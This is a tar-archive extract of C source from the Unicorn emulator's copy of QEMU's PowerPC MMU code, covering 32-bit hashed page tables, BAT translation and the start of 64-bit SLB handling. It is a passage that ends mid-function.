��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/mmu-hash32.c����������������������������������������������������������0000664�0000000�0000000�00000042717�14675241067�0020266�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * PowerPC MMU, TLB and BAT emulation helpers for QEMU. * * Copyright (c) 2003-2007 Jocelyn Mayer * Copyright (c) 2013 David Gibson, IBM Corporation * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/exec-all.h" #include "exec/helper-proto.h" #include "mmu-hash32.h" /* #define DEBUG_BAT */ #ifdef DEBUG_BATS # define LOG_BATS(...) 
qemu_log_mask(CPU_LOG_MMU, __VA_ARGS__) #else # define LOG_BATS(...) do { } while (0) #endif struct mmu_ctx_hash32 { hwaddr raddr; /* Real address */ int prot; /* Protection bits */ int key; /* Access key */ }; static int ppc_hash32_pp_prot(int key, int pp, int nx) { int prot; if (key == 0) { switch (pp) { case 0x0: case 0x1: case 0x2: prot = PAGE_READ | PAGE_WRITE; break; case 0x3: prot = PAGE_READ; break; default: abort(); } } else { switch (pp) { case 0x0: prot = 0; break; case 0x1: case 0x3: prot = PAGE_READ; break; case 0x2: prot = PAGE_READ | PAGE_WRITE; break; default: abort(); } } if (nx == 0) { prot |= PAGE_EXEC; } return prot; } static int ppc_hash32_pte_prot(PowerPCCPU *cpu, target_ulong sr, ppc_hash_pte32_t pte) { CPUPPCState *env = &cpu->env; unsigned pp, key; key = !!(msr_pr ? (sr & SR32_KP) : (sr & SR32_KS)); pp = pte.pte1 & HPTE32_R_PP; return ppc_hash32_pp_prot(key, pp, !!(sr & SR32_NX)); } static target_ulong hash32_bat_size(PowerPCCPU *cpu, target_ulong batu, target_ulong batl) { CPUPPCState *env = &cpu->env; if ((msr_pr && !(batu & BATU32_VP)) || (!msr_pr && !(batu & BATU32_VS))) { return 0; } return BATU32_BEPI & ~((batu & BATU32_BL) << 15); } static int hash32_bat_prot(PowerPCCPU *cpu, target_ulong batu, target_ulong batl) { int pp, prot; prot = 0; pp = batl & BATL32_PP; if (pp != 0) { prot = PAGE_READ | PAGE_EXEC; if (pp == 0x2) { prot |= PAGE_WRITE; } } return prot; } static target_ulong hash32_bat_601_size(PowerPCCPU *cpu, target_ulong batu, target_ulong batl) { if (!(batl & BATL32_601_V)) { return 0; } return BATU32_BEPI & ~((batl & BATL32_601_BL) << 17); } static int hash32_bat_601_prot(PowerPCCPU *cpu, target_ulong batu, target_ulong batl) { CPUPPCState *env = &cpu->env; int key, pp; pp = batu & BATU32_601_PP; if (msr_pr == 0) { key = !!(batu & BATU32_601_KS); } else { key = !!(batu & BATU32_601_KP); } return ppc_hash32_pp_prot(key, pp, 0); } static hwaddr ppc_hash32_bat_lookup(PowerPCCPU *cpu, target_ulong ea, int rwx, int *prot) { CPUPPCState *env = &cpu->env; target_ulong *BATlt, *BATut; int i; LOG_BATS("%s: %cBAT v " TARGET_FMT_lx "\n", __func__, rwx == 2 ? 'I' : 'D', ea); if (rwx == 2) { BATlt = env->IBAT[1]; BATut = env->IBAT[0]; } else { BATlt = env->DBAT[1]; BATut = env->DBAT[0]; } for (i = 0; i < env->nb_BATs; i++) { target_ulong batu = BATut[i]; target_ulong batl = BATlt[i]; target_ulong mask; if (unlikely(env->mmu_model == POWERPC_MMU_601)) { mask = hash32_bat_601_size(cpu, batu, batl); } else { mask = hash32_bat_size(cpu, batu, batl); } LOG_BATS("%s: %cBAT%d v " TARGET_FMT_lx " BATu " TARGET_FMT_lx " BATl " TARGET_FMT_lx "\n", __func__, type == ACCESS_CODE ? 'I' : 'D', i, ea, batu, batl); if (mask && ((ea & mask) == (batu & BATU32_BEPI))) { hwaddr raddr = (batl & mask) | (ea & ~mask); if (unlikely(env->mmu_model == POWERPC_MMU_601)) { *prot = hash32_bat_601_prot(cpu, batu, batl); } else { *prot = hash32_bat_prot(cpu, batu, batl); } return raddr & TARGET_PAGE_MASK; } } /* No hit */ #if defined(DEBUG_BATS) if (qemu_log_enabled()) { LOG_BATS("no BAT match for " TARGET_FMT_lx ":\n", ea); for (i = 0; i < 4; i++) { BATu = &BATut[i]; BATl = &BATlt[i]; BEPIu = *BATu & BATU32_BEPIU; BEPIl = *BATu & BATU32_BEPIL; bl = (*BATu & 0x00001FFC) << 15; LOG_BATS("%s: %cBAT%d v " TARGET_FMT_lx " BATu " TARGET_FMT_lx " BATl " TARGET_FMT_lx "\n\t" TARGET_FMT_lx " " TARGET_FMT_lx " " TARGET_FMT_lx "\n", __func__, type == ACCESS_CODE ? 
'I' : 'D', i, ea, *BATu, *BATl, BEPIu, BEPIl, bl); } } #endif return -1; } static int ppc_hash32_direct_store(PowerPCCPU *cpu, target_ulong sr, target_ulong eaddr, int rwx, hwaddr *raddr, int *prot) { CPUState *cs = CPU(cpu); CPUPPCState *env = &cpu->env; int key = !!(msr_pr ? (sr & SR32_KP) : (sr & SR32_KS)); qemu_log_mask(CPU_LOG_MMU, "direct store...\n"); if ((sr & 0x1FF00000) >> 20 == 0x07f) { /* * Memory-forced I/O controller interface access * * If T=1 and BUID=x'07F', the 601 performs a memory access * to SR[28-31] LA[4-31], bypassing all protection mechanisms. */ *raddr = ((sr & 0xF) << 28) | (eaddr & 0x0FFFFFFF); *prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; return 0; } if (rwx == 2) { /* No code fetch is allowed in direct-store areas */ cs->exception_index = POWERPC_EXCP_ISI; env->error_code = 0x10000000; return 1; } switch (env->access_type) { case ACCESS_INT: /* Integer load/store : only access allowed */ break; case ACCESS_FLOAT: /* Floating point load/store */ cs->exception_index = POWERPC_EXCP_ALIGN; env->error_code = POWERPC_EXCP_ALIGN_FP; env->spr[SPR_DAR] = eaddr; return 1; case ACCESS_RES: /* lwarx, ldarx or srwcx. */ env->error_code = 0; env->spr[SPR_DAR] = eaddr; if (rwx == 1) { env->spr[SPR_DSISR] = 0x06000000; } else { env->spr[SPR_DSISR] = 0x04000000; } return 1; case ACCESS_CACHE: /* * dcba, dcbt, dcbtst, dcbf, dcbi, dcbst, dcbz, or icbi * * Should make the instruction do no-op. As it already do * no-op, it's quite easy :-) */ *raddr = eaddr; return 0; case ACCESS_EXT: /* eciwx or ecowx */ cs->exception_index = POWERPC_EXCP_DSI; env->error_code = 0; env->spr[SPR_DAR] = eaddr; if (rwx == 1) { env->spr[SPR_DSISR] = 0x06100000; } else { env->spr[SPR_DSISR] = 0x04100000; } return 1; default: cpu_abort(cs, "ERROR: instruction should not need " "address translation\n"); } if ((rwx == 1 || key != 1) && (rwx == 0 || key != 0)) { *raddr = eaddr; return 0; } else { cs->exception_index = POWERPC_EXCP_DSI; env->error_code = 0; env->spr[SPR_DAR] = eaddr; if (rwx == 1) { env->spr[SPR_DSISR] = 0x0a000000; } else { env->spr[SPR_DSISR] = 0x08000000; } return 1; } } hwaddr get_pteg_offset32(PowerPCCPU *cpu, hwaddr hash) { target_ulong mask = ppc_hash32_hpt_mask(cpu); return (hash * HASH_PTEG_SIZE_32) & mask; } static hwaddr ppc_hash32_pteg_search(PowerPCCPU *cpu, hwaddr pteg_off, bool secondary, target_ulong ptem, ppc_hash_pte32_t *pte) { hwaddr pte_offset = pteg_off; target_ulong pte0, pte1; int i; for (i = 0; i < HPTES_PER_GROUP; i++) { pte0 = ppc_hash32_load_hpte0(cpu, pte_offset); /* * pte0 contains the valid bit and must be read before pte1, * otherwise we might see an old pte1 with a new valid bit and * thus an inconsistent hpte value */ smp_rmb(); pte1 = ppc_hash32_load_hpte1(cpu, pte_offset); if ((pte0 & HPTE32_V_VALID) && (secondary == !!(pte0 & HPTE32_V_SECONDARY)) && HPTE32_V_COMPARE(pte0, ptem)) { pte->pte0 = pte0; pte->pte1 = pte1; return pte_offset; } pte_offset += HASH_PTE_SIZE_32; } return -1; } static void ppc_hash32_set_r(PowerPCCPU *cpu, hwaddr pte_offset, uint32_t pte1) { target_ulong base = ppc_hash32_hpt_base(cpu); hwaddr offset = pte_offset + 6; /* The HW performs a non-atomic byte update */ #ifdef UNICORN_ARCH_POSTFIX glue(stb_phys, UNICORN_ARCH_POSTFIX)(cpu->env.uc, CPU(cpu)->as, base + offset, ((pte1 >> 8) & 0xff) | 0x01); #else stb_phys(cpu->env.uc, CPU(cpu)->as, base + offset, ((pte1 >> 8) & 0xff) | 0x01); #endif } static void ppc_hash32_set_c(PowerPCCPU *cpu, hwaddr pte_offset, uint64_t pte1) { target_ulong base = ppc_hash32_hpt_base(cpu); hwaddr offset = 
pte_offset + 7; /* The HW performs a non-atomic byte update */ #ifdef UNICORN_ARCH_POSTFIX glue(stb_phys, UNICORN_ARCH_POSTFIX)(cpu->env.uc, CPU(cpu)->as, base + offset, (pte1 & 0xff) | 0x80); #else stb_phys(cpu->env.uc, CPU(cpu)->as, base + offset, (pte1 & 0xff) | 0x80); #endif } static hwaddr ppc_hash32_htab_lookup(PowerPCCPU *cpu, target_ulong sr, target_ulong eaddr, ppc_hash_pte32_t *pte) { hwaddr pteg_off, pte_offset; hwaddr hash; uint32_t vsid, pgidx, ptem; vsid = sr & SR32_VSID; pgidx = (eaddr & ~SEGMENT_MASK_256M) >> TARGET_PAGE_BITS; hash = vsid ^ pgidx; ptem = (vsid << 7) | (pgidx >> 10); #if 0 /* Page address translation */ qemu_log_mask(CPU_LOG_MMU, "htab_base " TARGET_FMT_plx " htab_mask " TARGET_FMT_plx " hash " TARGET_FMT_plx "\n", ppc_hash32_hpt_base(cpu), ppc_hash32_hpt_mask(cpu), hash); /* Primary PTEG lookup */ qemu_log_mask(CPU_LOG_MMU, "0 htab=" TARGET_FMT_plx "/" TARGET_FMT_plx " vsid=%" PRIx32 " ptem=%" PRIx32 " hash=" TARGET_FMT_plx "\n", ppc_hash32_hpt_base(cpu), ppc_hash32_hpt_mask(cpu), vsid, ptem, hash); #endif pteg_off = get_pteg_offset32(cpu, hash); pte_offset = ppc_hash32_pteg_search(cpu, pteg_off, 0, ptem, pte); if (pte_offset == -1) { /* Secondary PTEG lookup */ #if 0 qemu_log_mask(CPU_LOG_MMU, "1 htab=" TARGET_FMT_plx "/" TARGET_FMT_plx " vsid=%" PRIx32 " api=%" PRIx32 " hash=" TARGET_FMT_plx "\n", ppc_hash32_hpt_base(cpu), ppc_hash32_hpt_mask(cpu), vsid, ptem, ~hash); #endif pteg_off = get_pteg_offset32(cpu, ~hash); pte_offset = ppc_hash32_pteg_search(cpu, pteg_off, 1, ptem, pte); } return pte_offset; } static hwaddr ppc_hash32_pte_raddr(target_ulong sr, ppc_hash_pte32_t pte, target_ulong eaddr) { hwaddr rpn = pte.pte1 & HPTE32_R_RPN; hwaddr mask = ~TARGET_PAGE_MASK; return (rpn & ~mask) | (eaddr & mask); } int ppc_hash32_handle_mmu_fault(PowerPCCPU *cpu, vaddr eaddr, int rwx, int mmu_idx) { CPUState *cs = CPU(cpu); CPUPPCState *env = &cpu->env; target_ulong sr; hwaddr pte_offset; ppc_hash_pte32_t pte; int prot; const int need_prot[] = {PAGE_READ, PAGE_WRITE, PAGE_EXEC}; hwaddr raddr; assert((rwx == 0) || (rwx == 1) || (rwx == 2)); /* 1. Handle real mode accesses */ if (((rwx == 2) && (msr_ir == 0)) || ((rwx != 2) && (msr_dr == 0))) { /* Translation is off */ raddr = eaddr; tlb_set_page(cs, eaddr & TARGET_PAGE_MASK, raddr & TARGET_PAGE_MASK, PAGE_READ | PAGE_WRITE | PAGE_EXEC, mmu_idx, TARGET_PAGE_SIZE); return 0; } /* 2. Check Block Address Translation entries (BATs) */ if (env->nb_BATs != 0) { raddr = ppc_hash32_bat_lookup(cpu, eaddr, rwx, &prot); if (raddr != -1) { if (need_prot[rwx] & ~prot) { if (rwx == 2) { cs->exception_index = POWERPC_EXCP_ISI; env->error_code = 0x08000000; } else { cs->exception_index = POWERPC_EXCP_DSI; env->error_code = 0; env->spr[SPR_DAR] = eaddr; if (rwx == 1) { env->spr[SPR_DSISR] = 0x0a000000; } else { env->spr[SPR_DSISR] = 0x08000000; } } return 1; } tlb_set_page(cs, eaddr & TARGET_PAGE_MASK, raddr & TARGET_PAGE_MASK, prot, mmu_idx, TARGET_PAGE_SIZE); return 0; } } /* 3. Look up the Segment Register */ sr = env->sr[eaddr >> 28]; /* 4. Handle direct store segments */ if (sr & SR32_T) { if (ppc_hash32_direct_store(cpu, sr, eaddr, rwx, &raddr, &prot) == 0) { tlb_set_page(cs, eaddr & TARGET_PAGE_MASK, raddr & TARGET_PAGE_MASK, prot, mmu_idx, TARGET_PAGE_SIZE); return 0; } else { return 1; } } /* 5. Check for segment level no-execute violation */ if ((rwx == 2) && (sr & SR32_NX)) { cs->exception_index = POWERPC_EXCP_ISI; env->error_code = 0x10000000; return 1; } /* 6. 
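Locate the PTE in the hash table. As a concrete example of the hash
 * computed by ppc_hash32_htab_lookup() above: for SR[VSID] = 0x123 and
 * eaddr = 0x12345000 with 4 KiB pages, pgidx = (0x12345000 &
 * 0x0FFFFFFF) >> 12 = 0x2345, the primary hash is 0x123 ^ 0x2345 =
 * 0x2266 and the secondary hash is its one's complement;
 * get_pteg_offset32() then scales the hash by HASH_PTEG_SIZE_32 (64
 * bytes) and masks it with ppc_hash32_hpt_mask() to pick the PTEG. */

/* 6 (continued):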
Locate the PTE in the hash table */ pte_offset = ppc_hash32_htab_lookup(cpu, sr, eaddr, &pte); if (pte_offset == -1) { if (rwx == 2) { cs->exception_index = POWERPC_EXCP_ISI; env->error_code = 0x40000000; } else { cs->exception_index = POWERPC_EXCP_DSI; env->error_code = 0; env->spr[SPR_DAR] = eaddr; if (rwx == 1) { env->spr[SPR_DSISR] = 0x42000000; } else { env->spr[SPR_DSISR] = 0x40000000; } } return 1; } qemu_log_mask(CPU_LOG_MMU, "found PTE at offset %08" HWADDR_PRIx "\n", pte_offset); /* 7. Check access permissions */ prot = ppc_hash32_pte_prot(cpu, sr, pte); if (need_prot[rwx] & ~prot) { /* Access right violation */ qemu_log_mask(CPU_LOG_MMU, "PTE access rejected\n"); if (rwx == 2) { cs->exception_index = POWERPC_EXCP_ISI; env->error_code = 0x08000000; } else { cs->exception_index = POWERPC_EXCP_DSI; env->error_code = 0; env->spr[SPR_DAR] = eaddr; if (rwx == 1) { env->spr[SPR_DSISR] = 0x0a000000; } else { env->spr[SPR_DSISR] = 0x08000000; } } return 1; } qemu_log_mask(CPU_LOG_MMU, "PTE access granted !\n"); /* 8. Update PTE referenced and changed bits if necessary */ if (!(pte.pte1 & HPTE32_R_R)) { ppc_hash32_set_r(cpu, pte_offset, pte.pte1); } if (!(pte.pte1 & HPTE32_R_C)) { if (rwx == 1) { ppc_hash32_set_c(cpu, pte_offset, pte.pte1); } else { /* * Treat the page as read-only for now, so that a later write * will pass through this function again to set the C bit */ prot &= ~PAGE_WRITE; } } /* 9. Determine the real address from the PTE */ raddr = ppc_hash32_pte_raddr(sr, pte, eaddr); tlb_set_page(cs, eaddr & TARGET_PAGE_MASK, raddr & TARGET_PAGE_MASK, prot, mmu_idx, TARGET_PAGE_SIZE); return 0; } hwaddr ppc_hash32_get_phys_page_debug(PowerPCCPU *cpu, target_ulong eaddr) { CPUPPCState *env = &cpu->env; target_ulong sr; hwaddr pte_offset; ppc_hash_pte32_t pte; int prot; if (msr_dr == 0) { /* Translation is off */ return eaddr; } if (env->nb_BATs != 0) { hwaddr raddr = ppc_hash32_bat_lookup(cpu, eaddr, 0, &prot); if (raddr != -1) { return raddr; } } sr = env->sr[eaddr >> 28]; if (sr & SR32_T) { /* FIXME: Add suitable debug support for Direct Store segments */ return -1; } pte_offset = ppc_hash32_htab_lookup(cpu, sr, eaddr, &pte); if (pte_offset == -1) { return -1; } return ppc_hash32_pte_raddr(sr, pte, eaddr) & TARGET_PAGE_MASK; } �������������������������������������������������unicorn-2.1.1/qemu/target/ppc/mmu-hash32.h����������������������������������������������������������0000664�0000000�0000000�00000007756�14675241067�0020277�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef MMU_HASH32_H #define MMU_HASH32_H hwaddr get_pteg_offset32(PowerPCCPU *cpu, hwaddr hash); hwaddr ppc_hash32_get_phys_page_debug(PowerPCCPU *cpu, target_ulong addr); int ppc_hash32_handle_mmu_fault(PowerPCCPU *cpu, vaddr address, int rw, int mmu_idx); /* * Segment register definitions */ #define SR32_T 0x80000000 #define SR32_KS 0x40000000 #define SR32_KP 0x20000000 #define SR32_NX 0x10000000 #define SR32_VSID 0x00ffffff /* * Block Address Translation (BAT) definitions */ #define BATU32_BEPI 0xfffe0000 #define BATU32_BL 0x00001ffc #define BATU32_VS 0x00000002 #define BATU32_VP 0x00000001 #define BATL32_BRPN 0xfffe0000 #define BATL32_WIMG 0x00000078 #define BATL32_PP 0x00000003 /* PowerPC 601 has 
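slightly different BAT registers, which are defined just below. First,
 * an illustrative sketch (not part of the build) of how the generic BAT
 * fields above combine into a translation; it mirrors hash32_bat_size()
 * and ppc_hash32_bat_lookup() in mmu-hash32.c, and the function name is
 * hypothetical. */
#if 0
static hwaddr example_bat_translate(target_ulong batu, target_ulong batl,
                                    target_ulong ea)
{
    /* BL = 0 maps a 128 KiB block (mask 0xFFFE0000); an all-ones BL
     * maps 256 MiB (mask 0xF0000000). */
    target_ulong mask = BATU32_BEPI & ~((batu & BATU32_BL) << 15);

    if ((ea & mask) != (batu & BATU32_BEPI)) {
        return -1; /* effective address outside this block */
    }
    return (batl & mask) | (ea & ~mask);
}
#endif

/* As noted, the 601 has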
slightly different BAT registers */ #define BATU32_601_KS 0x00000008 #define BATU32_601_KP 0x00000004 #define BATU32_601_PP 0x00000003 #define BATL32_601_V 0x00000040 #define BATL32_601_BL 0x0000003f /* * Hash page table definitions */ #define SDR_32_HTABORG 0xFFFF0000UL #define SDR_32_HTABMASK 0x000001FFUL #define HPTES_PER_GROUP 8 #define HASH_PTE_SIZE_32 8 #define HASH_PTEG_SIZE_32 (HASH_PTE_SIZE_32 * HPTES_PER_GROUP) #define HPTE32_V_VALID 0x80000000 #define HPTE32_V_VSID 0x7fffff80 #define HPTE32_V_SECONDARY 0x00000040 #define HPTE32_V_API 0x0000003f #define HPTE32_V_COMPARE(x, y) (!(((x) ^ (y)) & 0x7fffffbf)) #define HPTE32_R_RPN 0xfffff000 #define HPTE32_R_R 0x00000100 #define HPTE32_R_C 0x00000080 #define HPTE32_R_W 0x00000040 #define HPTE32_R_I 0x00000020 #define HPTE32_R_M 0x00000010 #define HPTE32_R_G 0x00000008 #define HPTE32_R_WIMG 0x00000078 #define HPTE32_R_PP 0x00000003 static inline hwaddr ppc_hash32_hpt_base(PowerPCCPU *cpu) { return cpu->env.spr[SPR_SDR1] & SDR_32_HTABORG; } static inline hwaddr ppc_hash32_hpt_mask(PowerPCCPU *cpu) { return ((cpu->env.spr[SPR_SDR1] & SDR_32_HTABMASK) << 16) | 0xFFFF; } static inline target_ulong ppc_hash32_load_hpte0(PowerPCCPU *cpu, hwaddr pte_offset) { target_ulong base = ppc_hash32_hpt_base(cpu); #ifdef UNICORN_ARCH_POSTFIX return glue(ldl_phys, UNICORN_ARCH_POSTFIX)(cpu->env.uc, CPU(cpu)->as, base + pte_offset); #else return ldl_phys(cpu->env.uc, CPU(cpu)->as, base + pte_offset); #endif } static inline target_ulong ppc_hash32_load_hpte1(PowerPCCPU *cpu, hwaddr pte_offset) { target_ulong base = ppc_hash32_hpt_base(cpu); #ifdef UNICORN_ARCH_POSTFIX return glue(ldl_phys, UNICORN_ARCH_POSTFIX)(cpu->env.uc, CPU(cpu)->as, base + pte_offset + HASH_PTE_SIZE_32 / 2); #else return ldl_phys(cpu->env.uc, CPU(cpu)->as, base + pte_offset + HASH_PTE_SIZE_32 / 2); #endif } static inline void ppc_hash32_store_hpte0(PowerPCCPU *cpu, hwaddr pte_offset, target_ulong pte0) { target_ulong base = ppc_hash32_hpt_base(cpu); #ifdef UNICORN_ARCH_POSTFIX glue(stl_phys, UNICORN_ARCH_POSTFIX)(cpu->env.uc, CPU(cpu)->as, base + pte_offset, pte0); #else stl_phys(cpu->env.uc, CPU(cpu)->as, base + pte_offset, pte0); #endif } static inline void ppc_hash32_store_hpte1(PowerPCCPU *cpu, hwaddr pte_offset, target_ulong pte1) { target_ulong base = ppc_hash32_hpt_base(cpu); #ifdef UNICORN_ARCH_POSTFIX glue(stl_phys, UNICORN_ARCH_POSTFIX)(cpu->env.uc, CPU(cpu)->as, base + pte_offset + HASH_PTE_SIZE_32 / 2, pte1); #else stl_phys(cpu->env.uc, CPU(cpu)->as, base + pte_offset + HASH_PTE_SIZE_32 / 2, pte1); #endif } typedef struct { uint32_t pte0, pte1; } ppc_hash_pte32_t; #endif /* MMU_HASH32_H */ ������������������unicorn-2.1.1/qemu/target/ppc/mmu-hash64.c����������������������������������������������������������0000664�0000000�0000000�00000110450�14675241067�0020261�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * PowerPC MMU, TLB, SLB and BAT emulation helpers for QEMU. 
* * Copyright (c) 2003-2007 Jocelyn Mayer * Copyright (c) 2013 David Gibson, IBM Corporation * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "qemu/units.h" #include "cpu.h" #include "exec/exec-all.h" #include "exec/helper-proto.h" #include "mmu-hash64.h" #include "mmu-book3s-v3.h" /* #define DEBUG_SLB */ #ifdef DEBUG_SLB # define LOG_SLB(...) qemu_log_mask(CPU_LOG_MMU, __VA_ARGS__) #else # define LOG_SLB(...) do { } while (0) #endif /* * SLB handling */ static ppc_slb_t *slb_lookup(PowerPCCPU *cpu, target_ulong eaddr) { CPUPPCState *env = &cpu->env; uint64_t esid_256M, esid_1T; int n; LOG_SLB("%s: eaddr " TARGET_FMT_lx "\n", __func__, eaddr); esid_256M = (eaddr & SEGMENT_MASK_256M) | SLB_ESID_V; esid_1T = (eaddr & SEGMENT_MASK_1T) | SLB_ESID_V; for (n = 0; n < cpu->hash64_opts->slb_size; n++) { ppc_slb_t *slb = &env->slb[n]; LOG_SLB("%s: slot %d %016" PRIx64 " %016" PRIx64 "\n", __func__, n, slb->esid, slb->vsid); /* * We check for 1T matches on all MMUs here - if the MMU * doesn't have 1T segment support, we will have prevented 1T * entries from being inserted in the slbmte code. */ if (((slb->esid == esid_256M) && ((slb->vsid & SLB_VSID_B) == SLB_VSID_B_256M)) || ((slb->esid == esid_1T) && ((slb->vsid & SLB_VSID_B) == SLB_VSID_B_1T))) { return slb; } } return NULL; } void dump_slb(PowerPCCPU *cpu) { CPUPPCState *env = &cpu->env; int i; uint64_t slbe, slbv; #if 0 cpu_synchronize_state(CPU(cpu)); qemu_printf("SLB\tESID\t\t\tVSID\n"); #endif for (i = 0; i < cpu->hash64_opts->slb_size; i++) { slbe = env->slb[i].esid; slbv = env->slb[i].vsid; if (slbe == 0 && slbv == 0) { continue; } #if 0 qemu_printf("%d\t0x%016" PRIx64 "\t0x%016" PRIx64 "\n", i, slbe, slbv); #endif } } void helper_slbia(CPUPPCState *env, uint32_t ih) { PowerPCCPU *cpu = env_archcpu(env); int starting_entry; int n; /* * slbia must always flush all TLB (which is equivalent to ERAT in ppc * architecture). Matching on SLB_ESID_V is not good enough, because slbmte * can overwrite a valid SLB without flushing its lookaside information. * * It would be possible to keep the TLB in synch with the SLB by flushing * when a valid entry is overwritten by slbmte, and therefore slbia would * not have to flush unless it evicts a valid SLB entry. However it is * expected that slbmte is more common than slbia, and slbia is usually * going to evict valid SLB entries, so that tradeoff is unlikely to be a * good one. * * ISA v2.05 introduced IH field with values 0,1,2,6. These all invalidate * the same SLB entries (everything but entry 0), but differ in what * "lookaside information" is invalidated. TCG can ignore this and flush * everything. * * ISA v3.0 introduced additional values 3,4,7, which change what SLBs are * invalidated. 
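 *
 * Summary of the behaviour implemented below (the TLB flush right
 * below happens in every case):
 *   IH = 0,1,2,6: invalidate SLB entries 1 .. slb_size-1
 *   IH = 3:       also entry 0, but preserve entries whose class
 *                 (SLB_VSID_C) is 0
 *   IH = 4:       also entry 0
 *   IH = 7:       invalidate no SLB entries, lookaside information only
 *   IH = 5:       undefined; treated as IH=0, with a guest-error warning
 * On pre-v3.0 MMUs the IH field is ignored and entries
 * 1 .. slb_size-1 are always invalidated.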
*/ env->tlb_need_flush |= TLB_NEED_LOCAL_FLUSH; starting_entry = 1; /* default for IH=0,1,2,6 */ if (env->mmu_model == POWERPC_MMU_3_00) { switch (ih) { case 0x7: /* invalidate no SLBs, but all lookaside information */ return; case 0x3: case 0x4: /* also considers SLB entry 0 */ starting_entry = 0; break; case 0x5: /* treat undefined values as ih==0, and warn */ qemu_log_mask(LOG_GUEST_ERROR, "slbia undefined IH field %u.\n", ih); break; default: /* 0,1,2,6 */ break; } } for (n = starting_entry; n < cpu->hash64_opts->slb_size; n++) { ppc_slb_t *slb = &env->slb[n]; if (!(slb->esid & SLB_ESID_V)) { continue; } if (env->mmu_model == POWERPC_MMU_3_00) { if (ih == 0x3 && (slb->vsid & SLB_VSID_C) == 0) { /* preserves entries with a class value of 0 */ continue; } } slb->esid &= ~SLB_ESID_V; } } static void __helper_slbie(CPUPPCState *env, target_ulong addr, target_ulong global) { PowerPCCPU *cpu = env_archcpu(env); ppc_slb_t *slb; slb = slb_lookup(cpu, addr); if (!slb) { return; } if (slb->esid & SLB_ESID_V) { slb->esid &= ~SLB_ESID_V; /* * XXX: given the fact that segment size is 256 MB or 1TB, * and we still don't have a tlb_flush_mask(env, n, mask) * in QEMU, we just invalidate all TLBs */ env->tlb_need_flush |= (global == false ? TLB_NEED_LOCAL_FLUSH : TLB_NEED_GLOBAL_FLUSH); } } void helper_slbie(CPUPPCState *env, target_ulong addr) { __helper_slbie(env, addr, false); } void helper_slbieg(CPUPPCState *env, target_ulong addr) { __helper_slbie(env, addr, true); } int ppc_store_slb(PowerPCCPU *cpu, target_ulong slot, target_ulong esid, target_ulong vsid) { CPUPPCState *env = &cpu->env; ppc_slb_t *slb = &env->slb[slot]; const PPCHash64SegmentPageSizes *sps = NULL; int i; if (slot >= cpu->hash64_opts->slb_size) { return -1; /* Bad slot number */ } if (esid & ~(SLB_ESID_ESID | SLB_ESID_V)) { return -1; /* Reserved bits set */ } if (vsid & (SLB_VSID_B & ~SLB_VSID_B_1T)) { return -1; /* Bad segment size */ } if ((vsid & SLB_VSID_B) && !(ppc_hash64_has(cpu, PPC_HASH64_1TSEG))) { return -1; /* 1T segment on MMU that doesn't support it */ } for (i = 0; i < PPC_PAGE_SIZES_MAX_SZ; i++) { const PPCHash64SegmentPageSizes *sps1 = &cpu->hash64_opts->sps[i]; if (!sps1->page_shift) { break; } if ((vsid & SLB_VSID_LLP_MASK) == sps1->slb_enc) { sps = sps1; break; } } if (!sps) { #if 0 error_report("Bad page size encoding in SLB store: slot "TARGET_FMT_lu " esid 0x"TARGET_FMT_lx" vsid 0x"TARGET_FMT_lx, slot, esid, vsid); #endif return -1; } slb->esid = esid; slb->vsid = vsid; slb->sps = sps; #if 0 LOG_SLB("%s: " TARGET_FMT_lu " " TARGET_FMT_lx " - " TARGET_FMT_lx " => %016" PRIx64 " %016" PRIx64 "\n", __func__, slot, esid, vsid, slb->esid, slb->vsid); #endif return 0; } static int ppc_load_slb_esid(PowerPCCPU *cpu, target_ulong rb, target_ulong *rt) { CPUPPCState *env = &cpu->env; int slot = rb & 0xfff; ppc_slb_t *slb = &env->slb[slot]; if (slot >= cpu->hash64_opts->slb_size) { return -1; } *rt = slb->esid; return 0; } static int ppc_load_slb_vsid(PowerPCCPU *cpu, target_ulong rb, target_ulong *rt) { CPUPPCState *env = &cpu->env; int slot = rb & 0xfff; ppc_slb_t *slb = &env->slb[slot]; if (slot >= cpu->hash64_opts->slb_size) { return -1; } *rt = slb->vsid; return 0; } static int ppc_find_slb_vsid(PowerPCCPU *cpu, target_ulong rb, target_ulong *rt) { CPUPPCState *env = &cpu->env; ppc_slb_t *slb; if (!msr_is_64bit(env, env->msr)) { rb &= 0xffffffff; } slb = slb_lookup(cpu, rb); if (slb == NULL) { #ifdef _MSC_VER *rt = (target_ulong)(0UL - 1UL); #else *rt = (target_ulong)-1ul; #endif } else { *rt = slb->vsid; } 
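/* A miss is reported through an all-ones *rt value rather than an
 * error return. */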
